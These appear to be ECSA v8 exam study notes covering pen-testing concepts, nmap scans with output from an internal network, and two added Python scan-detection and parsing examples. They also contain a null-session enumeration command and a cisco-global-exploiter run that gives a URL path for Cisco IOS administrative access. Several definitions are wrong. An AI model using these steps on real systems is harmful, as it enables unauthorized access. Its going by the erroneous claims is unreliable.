Oct 13, 2015
Rough hints v8
ECSA V8 key Learnings Hints for Exam
[email protected] Hints Manju Devaraj
ECSA v8
Key learnings/ Take away for Exam
By : Manju Devaraj
Data leaks -> Rogue employee & insider attacker.
More than 75% of budget -> is non-IT/security.
Core focus in IT security -> AAA, CIA & non-repudiation.
Risk = loss * exposure factor
IDLE scan - packet sent to the zombie computer's open port; the probe carries IP ID (IPID) 31400, and the response will carry 31401.
Metamorphic virus - code rewrites itself & the signature changes, but functionality stays the same.
Policies - Promiscuous policy, Permissive policy, Prudent policy, Paranoid policy.
Prudent security policy provides max security: all services are blocked, nothing is allowed, everything is logged.
Permissive security policy begins wide open; known dangers & attacks are blocked; impossible to keep up with current exploits.
Port nos. above 1024 are registered for vendor-specific applications.
Ports up to 1024 are well-known ports.
Positive acknowledgment with retransmission guarantees reliable delivery of data.
Windowing improves flow control & reliability.
TCP header fields, IDS, NIDS, IP fragmentation - to be prepared.
DoS SYN flooding takes advantage of a flaw in how hosts implement the 3-way handshake.
IDS evasion techniques are modifications made to an attack in order to prevent detection by an IDS.
WIDSs monitor & evaluate user & system activities, identify known attacks, determine abnormal activity, determine abnormal network activity, policy violations over WLAN, spoofing & MITM attacks.
Password cracking attacks
Dictionary - a dictionary DB is loaded.
Brute force - tries every combination.
Hybrid - works like dictionary but adds some numbers & symbols to the words in the dictionary.
Syllable - combination of brute force & dictionary.
Rule-based - used when the attacker gets some info about the password.
____________________________
Passwords are hashed & stored in the SAM, located in windows\system32\config\SAM
Linux
/etc/passwd or /etc/shadow
Rainbow tables contain pre-computed hashes of passwords (a precompiled hash table).
Social Engineering Types
Vishing - scamming users into surrendering private info over telephone lines.
Dumpster diving - searching for info in disposal areas, in material yet to be destroyed.
Shoulder surfing - looking over someone's shoulder to gain/gather info.
Phishing - using fake websites to redirect users; emails contain suspicious attachments.
Accomplice method - associated with bribing, handing out gifts, getting personally involved to become a friend.
Identity theft - stealing your name or personal info for fraudulent purposes.
Web 2.0 provides more attack surface for web exploitation; SQL injection is the biggest threat to Web 2.0.
Web spidering tools like Burp Suite are used to mirror a target website.
A web parameter tampering attack involves manipulation of parameters exchanged between client & server in order to modify application data such as user credentials & permissions, or the price & quantity of products. The best way to protect web applications from this is to apply effective input field filtering.
SQL injection takes advantage of non-validated input vulnerabilities to pass SQL commands through a web application.
LDAP injection attacks are similar to SQL injection attacks but exploit a user parameter to generate an LDAP query.
In a SOAP injection attack, the attacker injects malicious query strings into the user field to bypass service authentication mechanisms & access the backend DB.
Functional testing falls within the scope of black box testing; it is not required to have knowledge of the inner design of the code or logic.
SQL injection Vulnerabilities:
Detect SQL injection issues
Detect input Sanitization
Detect Truncation issues
Detect SQL modification issues
Challenges to IT security:
Environment complexity - insecure network design, multivendor environment.
New technologies - tunnels to bypass access controls.
New threats & exploits - on average a new threat is discovered every 4 hours.
Limited focus on security.
Limited security expertise.
Environmental complexity.
firewalk - tries to discover firewall rules using an IP TTL expiration technique known as firewalking.
nmap --script=firewalk --traceroute 64.54.40.3.2
nmap --script=firewalk --traceroute --script-args=firewalk.max-retries=1
nmap --script=firewalk --traceroute --script-args=firewalk.probe-timeout=400ms
While doing a pen test, create a log of all actions, results & findings.
HTTP/1.1 error code 407 -> Proxy Authentication Required
ICMP
Type 3 Code 3 -> Destination port unreachable
Type 3 Code 2 -> Destination protocol unreachable
Type 3 Code 13 -> Administratively prohibited (blocked)
Type 0 Code 0 -> Echo reply
Type 8 Code 0 -> Echo request
Codes:
0 Net Unreachable
1 Host Unreachable
2 Protocol Unreachable
3 Port Unreachable
4 Fragmentation Needed and Don't Fragment was Set
5 Source Route Failed
6 Destination Network Unknown
7 Destination Host Unknown
A pentest actively evaluates the security of an information system or network by simulating an attack. It goes one step further than vulnerability testing and adopts in-depth ethical hacking.
Blue team - test run with the knowledge of the org's IT staff.
Red team - pentest run without the knowledge of (without informing) the IT staff, but with the consent of upper management.
Pen testing types
Black box - blind testing & double blind; no knowledge of the infrastructure beforehand.
White box - announced & unannounced; has complete knowledge of the infrastructure.
Grey box - combination of black box & unannounced testing; limited knowledge.
Pen Test Phases
Pre-attack phase - passive reconnaissance & active reconnaissance.
Attack phase - perimeter, web application & wireless testing, etc.
Post-attack phase - removing all files & cleaning the registry.
Network security assessment activity in the attack phase -> identifies vulnerabilities & helps to improve the enterprise security policy.
Application security assessment -> source code review, authorization testing, functionality testing, web penetration testing.
Legal agreement -> scope of the project & consent of the company.
Rules of engagement/behavior -> require signatures from both the pen tester & the company.
Pen test pricing report -> no. of client computers/IPs to be tested & resources required, time to finish the project.
Tiger team -> a group of people hired to give details of the vulnerabilities present in the system.
Passive info gathering -> from public sources, e.g. using Netcraft.
Active info gathering -> social engineering, on-site visits, face-to-face interviews & tools, e.g. using Nessus (makes too much noise).
Nessus - its scripting language is NASL, which can be used to create custom scripts.
filetype:ppt -> finds PPTs on Google.
Gramm-Leach-Bliley Act -> protects consumers' personal financial information held by financial institutions and their service providers.
Family Educational Rights and Privacy Act (FERPA) - for students.
Active IDS - the IDS cuts off your connection when you run a vulnerability scan on a network.
Google search hackrouter.com -> will produce all sites that link to hackrouter.com.
XMAS scan - most of the ports scanned do not give a response; those ports are in the open state.
DNS Zone transfer comes in two flavors, full (opcode AXFR) and incremental (IXFR).
>dig example.com axfr
When a DNS zone transfer is allowed, you should get a complete listing of all DNS entries that have been
made in the DNS server for this domain. If the DNS server doesn't allow it, you will get an error
indicating that the Zone transfer didn't work.
Source & destination port in the TCP header: 16 bits each -> 2^16 = 65536 values.
Ack no./sequence no. -> 32 bits each.
WinXP repair risk -> pressing Shift+F10 gives the user administrative rights.
Null session hijacking
>net use \\10.10.2.225\ipc$ "" "/user:"
>net use
Glean information - with a null session connection, you can now use other utilities to gather critical Windows information remotely. Dozens of tools can gather this type of information.
net view \\10.10.2.225
Winfo and DumpSec can gather useful information about users and configurations, such as:
Windows domain to which the system belongs
Security policy settings
Local usernames
Drive shares
Countermeasures against null session hacks
Block NetBIOS on your Windows server by preventing these TCP ports from passing through your network firewall or personal firewall:
139 (NetBIOS session services)
Disable File and Printer Sharing for Microsoft Networks in the Properties tab of the machine's
Restrict anonymous connections to the system.
Set HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous to a DWORD value as follows:
None: This is the default setting.
Rely on Default Permissions (Setting 0): This setting allows the default null session connections.
Do Not Allow Enumeration of SAM Accounts and Shares (Setting 1): This is the medium security level setting. This setting still allows null sessions to be mapped to IPC$, enabling such tools as Walksam to garner information from the system.
No Access without Explicit Anonymous Permissions (Setting 2): This high security setting prevents null session connections and system enumeration.
Nmap Vulnerability scanning
nmap -sV --script=vulscan www.example.com
@echo Courtesy manju Devaraj
cd C:\Program Files\Nmap
cmd /c nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 10.186.27.1-254 > c:\temp\10.186.27.0.txt
nmap -iL c:\temp\ips.txt -sn -PS
Nmap scan report for phsv-rdscb2.ghmh.org (10.186.27.2)
Host is up (0.00s latency).
MAC Address: 00:50:56:A5:1C:F5 (VMware)
Nmap scan report for 10.186.27.5
Host is up (0.00s latency).
MAC Address: 00:50:56:A5:56:F4 (VMware)
Nmap scan report for phsv-print1.ghmh.org (10.186.27.7)
Host is up (0.00s latency).
MAC Address: 00:50:56:A5:75:57 (VMware)
Nmap done: 9 IP addresses (3 hosts up) scanned in 3.25 seconds
#########################################################
HOST DISCOVERY:
-PO[protocol list]: IP Protocol Ping
-Pn: Treat all hosts as online -- skip host discovery
##########################################################
nmap -iL c:\temp\ips.txt -sn -P0
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 05:46 Eastern Standard
Nmap scan report for 10.186.27.1
Host is up.
Nmap scan report for phsv-rdscb2.ghmh.org (10.186.27.2)
Host is up.
Nmap scan report for 10.186.27.3
Host is up.
Nmap scan report for 10.186.27.4
Host is up.
Nmap scan report for 10.186.27.5
Host is up.
Nmap scan report for 10.186.27.6
Host is up.
Nmap scan report for phsv-print1.ghmh.org (10.186.27.7)
Host is up.
Nmap scan report for 10.186.27.8
Host is up.
Nmap scan report for 10.186.27.9
Host is up.
Nmap done: 9 IP addresses (9 hosts up) scanned in 0.27 seconds
nmap -iL c:\temp\ips.txt -P0 -sU -p139,445,139,80 -v
C:\Program Files\Nmap>nmap -iL c:\temp\ips.txt -P0 -sU -p1-500
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 05:57 Eastern Standard Time
Nmap scan report for phsv-rdscb2.ghmh.org (10.186.27.2)
Host is up (0.00s latency).
Not shown: 495 closed ports
PORT STATE SERVICE
123/udp open|filtered ntp
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
161/udp open|filtered snmp
500/udp open|filtered isakmp
MAC Address: 00:50:56:A5:1C:F5 (VMware)
Nmap scan report for 10.186.27.5
Host is up (0.00s latency).
Not shown: 493 closed ports
PORT STATE SERVICE
123/udp open|filtered ntp
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
161/udp open|filtered snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
MAC Address: 00:50:56:A5:56:F4 (VMware)
Nmap scan report for phsv-print1.ghmh.org (10.186.27.7)
Host is up (0.00s latency).
Not shown: 495 closed ports
PORT STATE SERVICE
123/udp open|filtered ntp
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
161/udp open|filtered snmp
500/udp open|filtered isakmp
MAC Address: 00:50:56:A5:75:57 (VMware)
Nmap done: 9 IP addresses (3 hosts up) scanned in 309.64 seconds
nmap -v -sn 192.168.0.0/16 10.0.0.0/8
nmap -v -iR 10000 -Pn -p 80
! -iR -> random targets
nmap -iL c:\temp\ips.txt -P0 -sU -p1-1024 -vv -sV -O
! UDP scan - port range; -vv double verbose; -sV probes to determine the version of the service; -O detects the OS version
Xmas scan (-sX)
Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.
These three scan types are exactly the same in behavior except for the TCP flags set in probe packets. If
a RST packet is received, the port is considered closed, while no response means it is open|filtered. The
port is marked filtered if an ICMP unreachable error (type 3, code 1, 2, 3, 9, 10, or 13) is received.
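The two notes above (TCP header field widths, and how a NULL/FIN/Xmas probe's reply is interpreted) can be tied together in code. The following is an added example, not part of the original notes: it packs and parses the 20-byte fixed TCP header with struct, names the flag bits, classifies a packet as a NULL, FIN or Xmas probe the way a NIDS would, maps the reply onto the port states described above (RST -> closed, silence -> open|filtered, ICMP type 3 code 1/2/3/9/10/13 -> filtered), and raises an alert when one source sends stealth probes to several ports. All packets, addresses and the alert threshold are constructed for the example.

```python
"""TCP header parsing, stealth-probe classification and a simple detector.

Added example for the ECSA notes, not from the original page. The
packets below are constructed test data; the threshold of 3 distinct
ports per source is an assumption, not an Nmap or IDS default.
"""
import struct
from collections import defaultdict

# TCP flag bits in the 8-bit flags field (low to high)
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
# ICMP type 3 codes that Nmap reports as "filtered" for NULL/FIN/Xmas scans
FILTERED_ICMP_CODES = {1, 2, 3, 9, 10, 13}


def build_tcp_header(sport, dport, seq, ack, flags, window=1024):
    """Pack a 20-byte TCP header (no options; checksum left as 0 for test data)."""
    data_offset = 5 << 4  # header length of 5 x 32-bit words, reserved bits zero
    return struct.pack("!HHIIBBHHH", sport, dport, seq, ack, data_offset, flags, window, 0, 0)


def parse_tcp_header(data):
    """Decode the fixed TCP header: 16-bit ports (2**16 values), 32-bit seq/ack."""
    if len(data) < 20:
        raise ValueError("need at least 20 bytes of TCP header")
    sport, dport, seq, ack, off_res, flags, window, checksum, urgptr = struct.unpack("!HHIIBBHHH", data[:20])
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "data_offset": off_res >> 4, "flags": flags, "window": window,
            "checksum": checksum, "urgptr": urgptr}


def flag_names(flags):
    """Render the flag bits as e.g. 'FIN|PSH|URG'; 'NONE' for a NULL probe."""
    names = [("FIN", FIN), ("SYN", SYN), ("RST", RST), ("PSH", PSH), ("ACK", ACK), ("URG", URG)]
    return "|".join(n for n, bit in names if flags & bit) or "NONE"


def classify_probe(flags):
    """Name the stealth-scan probe type, or 'normal' for ordinary traffic.

    Anything carrying SYN or ACK belongs to a real handshake or session;
    the three scan types differ only in which of FIN/PSH/URG are set.
    """
    if flags & (SYN | ACK):
        return "normal"
    if flags == 0:
        return "null-scan"
    if flags == FIN:
        return "fin-scan"
    if flags == FIN | PSH | URG:
        return "xmas-scan"
    return "normal"


def port_state(response):
    """Interpret the reply to a NULL/FIN/Xmas probe exactly as the notes describe."""
    if response is None:                       # no reply at all
        return "open|filtered"
    if response["kind"] == "tcp" and response["flags"] & RST:
        return "closed"
    if response["kind"] == "icmp" and response["type"] == 3 and response["code"] in FILTERED_ICMP_CODES:
        return "filtered"
    return "unknown"                           # e.g. an ICMP code Nmap does not map


def stealth_scan_alerts(packets, threshold=3):
    """Return sources that sent stealth probes to at least `threshold` distinct ports."""
    hits = defaultdict(set)
    for src, raw in packets:
        hdr = parse_tcp_header(raw)
        kind = classify_probe(hdr["flags"])
        if kind != "normal":
            hits[src].add((kind, hdr["dport"]))
    return {src: sorted(h) for src, h in hits.items()
            if len({port for _, port in h}) >= threshold}


# Constructed traffic: one host Xmas/NULL-probing several ports, one normal client
SAMPLE_PACKETS = [
    ("192.0.2.10", build_tcp_header(40001, 21, 1, 0, FIN | PSH | URG)),
    ("192.0.2.10", build_tcp_header(40002, 22, 1, 0, FIN | PSH | URG)),
    ("192.0.2.10", build_tcp_header(40003, 445, 1, 0, FIN | PSH | URG)),
    ("192.0.2.10", build_tcp_header(40004, 3389, 1, 0, 0)),        # NULL probe
    ("198.51.100.7", build_tcp_header(51000, 443, 7, 0, SYN)),      # normal connect
    ("198.51.100.7", build_tcp_header(51000, 443, 8, 9, ACK)),      # established flow
]

if __name__ == "__main__":
    for src, raw in SAMPLE_PACKETS:
        h = parse_tcp_header(raw)
        print(f"{src:13s} -> port {h['dport']:5d} flags={flag_names(h['flags']):12s} {classify_probe(h['flags'])}")
    print("alerts:", stealth_scan_alerts(SAMPLE_PACKETS))
    print("RST reply  ->", port_state({"kind": "tcp", "flags": RST | ACK}))
    print("no reply   ->", port_state(None))
    print("ICMP 3/13  ->", port_state({"kind": "icmp", "type": 3, "code": 13}))
```

The detector keys on (probe type, destination port) pairs so that a scanner mixing NULL and Xmas probes against the same host still trips the threshold; a real sensor would also rate-limit by time window, which is left out here.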
C:\Program Files\Nmap>nmap -sR 10.186.27.12 -P0 -sT -p1-1024 -vv -sV -O
WARNING: -sR is now an alias for -sV and activates version detection as well as
RPC scan.
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 06:31 Eastern Standard Time
NSE: Loaded 23 scripts for scanning.
Initiating ARP Ping Scan at 06:31
Scanning 10.186.27.12 [1 port]
Completed ARP Ping Scan at 06:31, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:31
Completed Parallel DNS resolution of 1 host. at 06:31, 0.00s elapsed
Initiating Connect Scan at 06:31
Scanning 10.186.27.12 [1024 ports]
Discovered open port 135/tcp on 10.186.27.12
Discovered open port 445/tcp on 10.186.27.12
Discovered open port 139/tcp on 10.186.27.12
Completed Connect Scan at 06:32, 45.91s elapsed (1024 total ports)
Initiating Service scan at 06:32
Scanning 3 services on 10.186.27.12
Completed Service scan at 06:32, 6.03s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 10.186.27.12
NSE: Script scanning 10.186.27.12.
NSE: Starting runlevel 1 (of 1) scan.
Nmap scan report for 10.186.27.12
Host is up (0.00s latency).
Scanned at 2013-11-13 06:31:59 Eastern Standard Time for 53s
Not shown: 1021 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open netbios-ssn
MAC Address: 00:50:56:A5:75:3A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 o
pen and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7|2008
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:mic
rosoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_8
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, or Windows 8
TCP/IP fingerprint:
OS:SCAN(V=6.40%E=4%D=11/13%OT=135%CT=%CU=34426%PV=Y%DS=1%DC=D%G=N%M=005056%
OS:TM=52836364%P=i686-pc-windows-windows)SEQ(SP=102%GCD=1%ISR=10A%TI=I%CI=I
OS:%II=I%SS=S%TS=7)OPS(O1=M5B4NW8ST11%O2=M5B4NW8ST11%O3=M5B4NW8NNT11%O4=M5B
OS:4NW8ST11%O5=M5B4NW8ST11%O6=M5B4ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%
OS:W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M5B4NW8NNS%CC=N%Q=)T1(R=Y%DF=
OS:Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q
OS:=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%
OS:A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%
OS:DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%
OS:O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD
OS:=G)IE(R=Y%DFI=N%T=80%CD=Z)
Uptime guess: 7.366 days (since Tue Nov 05 21:45:37 2013)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: C:\Program Files\Nmap
OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.46 seconds
Raw packets sent: 17 (1.446KB) | Rcvd: 17 (1.358KB)
C:\Program Files\Nmap>
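The scan transcripts above are in Nmap's normal output format, which is easy to parse for an inventory. The following is an added example, not part of the original notes and not Nmap's own code: it reads "Nmap scan report for" blocks, the "Host is up" line, the PORT/STATE/SERVICE(/VERSION) table and the MAC line, returns one record per host, and then flags the exposures a reviewer would pull out of the UDP and TCP results shown above (NetBIOS name service, SMB, reachable SNMP). The sample output is constructed in the same format as the transcripts, with documentation addresses; the list of "risky" services is the example's own assumption.

```python
"""Parse Nmap normal output into host records and flag exposed services.

Added example for the ECSA notes (not Nmap's code). SAMPLE_OUTPUT is
constructed in the same layout as the scan transcripts in the notes;
the RISKY table is an assumption chosen to match the services the notes
discuss (NetBIOS, SMB, SNMP).
"""
import re

REPORT_RE = re.compile(r"^Nmap scan report for (?:(?P<name>\S+) \((?P<ip>[\d.]+)\)|(?P<ip2>[\d.]+))$")
PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>[\w|]+)\s+(?P<service>\S+)(?:\s+(?P<version>.*))?$")
MAC_RE = re.compile(r"^MAC Address: (?P<mac>[0-9A-F:]{17})(?: \((?P<vendor>[^)]*)\))?$")
DONE_RE = re.compile(r"^Nmap done: (\d+) IP address(?:es)? \((\d+) hosts? up\) scanned in ([\d.]+) seconds$")

# (protocol, port) -> why a reviewer should look at it (assumed for the example)
RISKY = {
    ("udp", 137): "NetBIOS name service exposed",
    ("tcp", 139): "NetBIOS session service exposed",
    ("tcp", 445): "SMB exposed",
    ("udp", 161): "SNMP reachable (check community strings)",
}


def parse_nmap_output(text):
    """Return a list of host dicts: ip, name, up, mac, vendor and a ports list."""
    hosts, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = REPORT_RE.match(line)
        if m:
            current = {"ip": m.group("ip") or m.group("ip2"), "name": m.group("name"),
                       "up": False, "mac": None, "vendor": None, "ports": []}
            hosts.append(current)
            continue
        if current is None:          # banner lines before the first report
            continue
        if line.startswith("Host is up"):
            current["up"] = True
            continue
        m = MAC_RE.match(line)
        if m:
            current["mac"], current["vendor"] = m.group("mac"), m.group("vendor")
            continue
        m = PORT_RE.match(line)      # the 'PORT STATE SERVICE' header does not match
        if m:
            current["ports"].append({"port": int(m.group("port")), "proto": m.group("proto"),
                                     "state": m.group("state"), "service": m.group("service"),
                                     "version": (m.group("version") or "").strip()})
    return hosts


def scan_summary(text):
    """Parse the trailing 'Nmap done' line into targets/up/seconds, or None."""
    for raw in text.splitlines():
        m = DONE_RE.match(raw.strip())
        if m:
            return {"targets": int(m.group(1)), "up": int(m.group(2)), "seconds": float(m.group(3))}
    return None


def exposure_findings(hosts):
    """List (ip, port/proto, state, note) for open or open|filtered risky services."""
    findings = []
    for h in hosts:
        for p in h["ports"]:
            note = RISKY.get((p["proto"], p["port"]))
            if note and p["state"].startswith("open"):
                findings.append((h["ip"], f'{p["port"]}/{p["proto"]}', p["state"], note))
    return findings


# Constructed sample in Nmap normal-output layout (documentation addresses)
SAMPLE_OUTPUT = """\
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 05:57 Eastern Standard Time
Nmap scan report for fileserver.example.test (192.0.2.2)
Host is up (0.00s latency).
Not shown: 495 closed ports
PORT     STATE         SERVICE
123/udp  open|filtered ntp
137/udp  open          netbios-ns
161/udp  open|filtered snmp
MAC Address: 00:50:56:00:00:01 (VMware)
Nmap scan report for 192.0.2.5
Host is up (0.00s latency).
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  netbios-ssn
MAC Address: 00:50:56:00:00:02 (VMware)
Nmap scan report for 192.0.2.9
Host is up.
Nmap done: 9 IP addresses (3 hosts up) scanned in 309.64 seconds
"""

if __name__ == "__main__":
    hosts = parse_nmap_output(SAMPLE_OUTPUT)
    for h in hosts:
        print(h["ip"], h["name"] or "-", h["vendor"] or "-", [f'{p["port"]}/{p["proto"]}' for p in h["ports"]])
    for finding in exposure_findings(hosts):
        print("FINDING:", *finding)
    print(scan_summary(SAMPLE_OUTPUT))
```

Because "open|filtered" means a UDP probe simply got no answer, the example treats it as worth a finding rather than proof of exposure; follow up with a version probe (-sV) or an SNMP walk with known credentials before reporting it as confirmed.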
Form Scalpel is used for dissecting HTML forms; the tool can extract all HTML forms from pages.
BackTrack to exploit a Cisco IOS vulnerability
root@skull:/pentest/cisco/cisco-global-exploiter# ./cge.pl
Usage :
perl cge.pl
Vulnerabilities list :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability
root@skull:/pentest/cisco/cisco-global-exploiter# ./cge.pl *0.2*.*4.1 3
Vulnerability successful exploited with [http://*0.2*.*4.1/level/17/exec/....] ...
/level/$NUMBER/exec/show/config/cr
where $NUMBER is an integer between 16 and 99.
root@skull:/pentest/cisco/cisco-global-exploiter# firefox http://*0.2*.*4.1/level/17/exec/....
http://10.10.0.21/level/99/exec/show/config
Click cancel to the logon box and enter the following address:
Information technology risk
Risk = Threat x Vulnerability x Asset Value
Fuzzing attack - injection technique
A fuzzer is a program which automatically injects semi-random data into a program/stack and detects bugs.
The fuzzing scan does just as described above: it generates totally random input for the specified request parameters for a specified number of requests, hoping to provoke something unexpected. By default the generated values will be between 5 and 15 characters in length and mutated 100 times.
Inputting a massive amount of data to crash the web application.
Dumb fuzz testing
Smart fuzz testing - knowing the underlying structure of the database, supply huge inputs accordingly.
Anonymiser - can be used to get around blocked access.
Information vulnerability - job postings and other postings exposing information about the technology in use.
Citrix server's port - 2598 is used to scan a network to find the Citrix machines.
Stacheldraht
The original DDoS tool "Stacheldraht" - a German word meaning 'barbed wire' - was released during the middle of 1999.
Stacheldraht works on most Solaris and Linux systems. The original Stacheldraht, written by the hacker 'randomizer', was found to be running mostly on the Solaris platform because the Linux version is quite broken.
Stacheldraht by itself is a malicious program that covers its tracks within a compromised system and communicates over the network by covert channel and encryption. The attacker could control hundreds or thousands of compromised systems via a single command line interface and afterwards launch different types of DDoS attack at a victim. It combines the features available from Trinoo and TFN and adds some new DDoS attacks.
http://packetstormsecurity.com/distributed
Common Vulnerabilities and Exposures (CVE) - submit the IDS logs for any new vulnerability.
Software firewalls operate at the DLL.